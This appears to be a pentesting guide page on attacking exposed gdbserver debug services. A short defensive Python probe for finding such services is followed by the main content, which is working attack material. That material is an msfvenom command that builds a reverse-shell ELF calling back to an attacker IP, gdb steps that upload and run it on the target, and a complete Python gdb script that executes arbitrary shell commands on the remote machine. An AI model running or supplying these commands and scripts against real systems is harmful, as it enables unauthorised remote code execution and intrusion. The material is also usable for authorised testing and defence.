# Pentesting Remote GdbServer
## **Basic Information**

**gdbserver** is a tool that makes it possible to debug programs remotely. It runs on the same system as the program that needs debugging, known as the "target". This setup lets the **GNU Debugger** connect from a different machine, the "host", where the source code and a binary copy of the debugged program are stored. The connection between **gdbserver** and the debugger can be made over TCP or a serial line, which allows for a variety of debugging setups.

**gdbserver can be configured to listen on any port**, and currently **nmap is not capable of recognizing this service**.
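The section above notes that nmap does not fingerprint this service. As an added example that is not part of the original page, the following Python speaks enough of the GDB Remote Serial Protocol (RSP) to identify a listening GDB stub on a host you administer, so an exposed gdbserver can be found and closed before it is used the way the rest of this page describes: it frames a `qSupported` query with the RSP checksum, validates the checksum of the reply, and checks for the `PacketSize=` feature list a stub returns. The `probe` helper and its host/port arguments are assumptions; the framing functions run offline.

```python
import socket

def rsp_checksum(payload: bytes) -> int:
    """GDB Remote Serial Protocol checksum: sum of payload bytes modulo 256."""
    return sum(payload) % 256

def rsp_frame(payload: bytes) -> bytes:
    """Frame a payload as '$' + payload + '#' + two lowercase hex checksum digits."""
    return b"$" + payload + b"#" + b"%02x" % rsp_checksum(payload)

def rsp_unframe(data: bytes) -> bytes:
    """Extract and checksum-verify the first packet in a reply such as
    b'+$PacketSize=3fff;...#xx'. Raises ValueError on malformed input."""
    start = data.find(b"$")
    end = data.find(b"#", start)
    if start < 0 or end < 0 or len(data) < end + 3:
        raise ValueError("no complete RSP packet in reply")
    payload = data[start + 1:end]
    if rsp_checksum(payload) != int(data[end + 1:end + 3], 16):
        raise ValueError("bad RSP checksum")
    return payload

def looks_like_gdb_stub(reply: bytes) -> bool:
    """A GDB stub answers qSupported with a feature list beginning 'PacketSize='."""
    try:
        return rsp_unframe(reply).startswith(b"PacketSize=")
    except ValueError:
        return False

def probe(host: str, port: int, timeout: float = 3.0) -> bool:
    """Send qSupported to host:port (assumed to be a system you administer) and
    report whether the peer speaks RSP, i.e. is an exposed GDB stub."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(rsp_frame(b"qSupported"))
        reply = b""
        try:
            # Read until '#' plus its two checksum digits have arrived.
            while b"#" not in reply or len(reply) < reply.find(b"#") + 3:
                chunk = s.recv(4096)
                if not chunk:
                    break
                reply += chunk
        except socket.timeout:
            pass
        if reply.startswith(b"+$"):
            s.sendall(b"+")  # acknowledge so the stub does not retransmit
    return looks_like_gdb_stub(reply)
```

Any host where `probe` returns True is running a debug stub that will accept `remote put` and `set remote exec-file` from anyone who can reach the port, so treat it as unauthenticated remote code execution and restrict it to loopback or a firewalled debug network.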
## Exploitation

### Upload and Execute

You can easily **create an elf backdoor with msfvenom**, upload it and execute it:

```bash
# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
chmod +x binary.elf
gdb binary.elf
# Set remote debugger target
target extended-remote 10.10.10.11:1337

# Upload elf file
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable
run

# You should get your reverse-shell
```

### Execute arbitrary commands

**There is another way to make the debugger execute arbitrary commands** via a [**python custom script taken from here**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).

```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345

# Load our custom gdb command `rcmd`.
source ./remote-cmd.py

# Change to a trusty binary and run it to load it
set remote exec-file /bin/bash
r

# Run until a point where libc has been loaded on the remote process, e.g. start of main().
tb main
r

# Run the remote command, e.g. `ls`.
rcmd ls
```

First **create this script locally**:

{% code title="remote-cmd.py" %}
```python
#!/usr/bin/env python3
# Defines the gdb command `rcmd <command>`: it forks the remote inferior, execs
# `/bin/sh -c "<command>"` in the child with output redirected to a temp file,
# then reads that file back through the parent inferior and prints it.
import gdb
import re
import traceback
import uuid


class RemoteCmd(gdb.Command):
    def __init__(self):
        self.addresses = {}
        self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
        gdb.write(f"Using tmp output file: {self.tmp_file}.\n")
        gdb.execute("set detach-on-fork off")
        gdb.execute("set follow-fork-mode parent")
        gdb.execute("set max-value-size unlimited")
        gdb.execute("set pagination off")
        gdb.execute("set print elements 0")
        gdb.execute("set print repeats 0")
        super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)

    def preload(self):
        # Resolve every libc symbol we need up front so a missing one fails early.
        for symbol in [
            "close",
            "execl",
            "fork",
            "free",
            "lseek",
            "malloc",
            "open",
            "read",
        ]:
            self.load(symbol)

    def load(self, symbol):
        # `info address <sym>` on a minimal (non-debug) symbol prints
        # 'Symbol "<sym>" is at 0x... in a file compiled without debugging.'
        if symbol not in self.addresses:
            address_string = gdb.execute(f"info address {symbol}", to_string=True)
            match = re.match(
                f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
            )
            if match and len(match.groups()) > 0:
                self.addresses[symbol] = match.groups()[0]
            else:
                raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')
        return self.addresses[symbol]

    def output(self):
        # Read the captured output file back via the inferior's own libc calls.
        # From `fcntl-linux.h`
        O_RDONLY = 0
        gdb.execute(
            f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
        )

        # From `stdio.h`
        SEEK_SET = 0
        SEEK_END = 2
        gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
        gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')

        if int(gdb.convenience_variable("len")) <= 0:
            gdb.write("No output was captured.")
            return

        gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
        gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
        gdb.execute('printf "%s\\n", (char*) $mem')

        gdb.execute(f'call (int){self.load("close")}($fd)')
        gdb.execute(f'call (int){self.load("free")}($mem)')

    def invoke(self, arg, from_tty):
        # Read the setting before the try block so the finally clause can always
        # restore it, even if preload() fails.
        is_auto_solib_add = gdb.parameter("auto-solib-add")
        try:
            self.preload()
            gdb.execute("set auto-solib-add off")
            parent_inferior = gdb.selected_inferior()
            gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
            child_pid = gdb.convenience_variable("child_pid")
            child_inferior = list(
                filter(lambda x: x.pid == child_pid, gdb.inferiors())
            )[0]
            gdb.execute(f"inferior {child_inferior.num}")

            try:
                gdb.execute(
                    f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
                )
            except gdb.error as e:
                # execl never returns on success: gdb reports the child as having
                # exited inside the called function, which is the expected outcome.
                if (
                    "The program being debugged exited while in a function called from GDB"
                    in str(e)
                ):
                    pass
                else:
                    raise e
            finally:
                gdb.execute(f"inferior {parent_inferior.num}")
                gdb.execute(f"remove-inferiors {child_inferior.num}")

            self.output()

        except Exception as e:
            gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
            raise e
        finally:
            gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')


RemoteCmd()
```
{% endcode %}